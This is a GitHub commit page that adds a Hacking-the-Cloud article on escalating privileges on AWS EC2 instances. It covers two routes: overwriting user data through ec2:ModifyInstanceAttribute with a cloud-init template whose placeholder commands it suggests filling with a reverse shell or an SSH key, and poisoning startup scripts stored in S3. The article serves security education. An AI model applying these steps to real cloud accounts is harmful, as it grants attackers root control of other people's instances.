Skip to content

Commit

Permalink
Merge pull request #358 from Hacking-the-Cloud/merge/2_user_data_arti…
Browse files Browse the repository at this point in the history 
…cles

Merged 2 user data priv esc articles into one
  • Loading branch information
@Frichetten
Frichetten committed Jan 22, 2024
2 parents 9c9256e + 293e9bf commit dca6d81
Show file tree
Hide file tree
Showing 3 changed files with 105 additions and 108 deletions.
81 changes: 0 additions & 81 deletions content/aws/exploitation/local-priv-esc-mod-instance-att.md
View file

This file was deleted.

27 changes: 0 additions & 27 deletions content/aws/exploitation/local-priv-esc-user-data-s3.md
View file

This file was deleted.

105 changes: 105 additions & 0 deletions content/aws/exploitation/local_ec2_priv_esc_through_user_data.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,105 @@
---
author_name: Nick Frichette
title: EC2 Privilege Escalation Through User Data
description: How to escalate privileges on an EC2 instance by abusing user data.
---

## ec2:ModifyInstanceAttribute

<div class="grid cards" markdown>
- :material-shield-lock:{ .lg .middle } __Required IAM Permissions__

---

- [ec2:ModifyInstanceAttribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-instance-attribute.html)

- :material-shield-plus:{ .lg .middle } __Recommended but not Required IAM Permissions__

---

- [ec2:StartInstances](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/start-instances.html)
- [ec2:DescribeInstances](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/start-instances.html)
- [ec2:StopInstances](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/stop-instances.html)
</div>
<div class="grid cards" markdown>
- :material-account:{ .lg .middle } __Original Research__

---

[aws_pwn:elevation](https://github.com/dagrz/aws_pwn/blob/master/elevation/bouncy_bouncy_cloudy_cloud.py) by [Daniel Grzelak](https://twitter.com/dagrz)
</div>

If an adversary has access to the modify-instance attribute permission they can leverage it to escalate to root/System on an EC2 instance.

Usually, user data scripts are only run the first time the instance is started, however this can be changed using [cloud-init](https://aws.amazon.com/premiumsupport/knowledge-center/execute-user-data-ec2/) to run every time the instance restarts.

To do this, first create a file in the following format.

```
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
**commands here**
--//
```

Modify the ```commands here``` section to do whatever action you want. Setting a reverse shell, adding an ssh key to the default user, etc. are all good options.

Once you've done that, convert the file to base64. Linux can do this with the following command.

```base64 file.txt > file.b64.txt```

Windows can do this with the following command.

```certutil -encode file.txt tmp.b64 && findstr /v /c:- tmp.b64 > file.b64.txt```

Now that you've base64 encoded your payload, you will leverage the [ec2:ModifyInstanceAttribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-instance-attribute.html) API call to change the user data of the target instance.

!!! Note
The instance will need to be stopped to modify its user data. You'll either have to stop it yourself, or wait for something else to stop it.

```
aws ec2 modify-instance-attribute \
--instance-id=xxx \
--attribute userData \
--value file://file.b64.txt
```

With that change made, simply start the instance again and your command will be executed with root/System.

## Leverage scripts in S3

A common pattern when using EC2 is to define a [user data](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html) script to be run when an instance is first started or after a reboot. These scripts are typically used to install software, download and set a config, etc. Oftentimes the scripts and packages are pulled from S3 and this introduces an opportunity for a developer/ops person to make a mistake.

If the IAM role is too permissive and allows the role to write to that location, an adversary can leverage this for privilege escalation. Additionally, if there is any other kind of misconfiguration on the bucket itself, or another role which has access gets compromised, an adversary can take advantage of this as well.

Take the following user data script:

```
#!/bin/bash
aws s3 cp s3://example-boot-bucket/start_script.sh /root/start_script.sh
chmod +x /root/start_script.sh
/root/start_script.sh
```

On first launch, the EC2 instance will pull the start_script from S3 and will run it. If an adversary can write to that location, they can escalate privileges or gain control of the EC2 instance.

!!! Note
In addition to new instances being spun up or after a reboot, poisoning the scripts/applications can also effect EC2 instances in an [Auto Scaling Group](https://docs.aws.amazon.com/autoscaling/ec2/userguide/AutoScalingGroup.html).

0 comments on commit dca6d81

Please sign in to comment.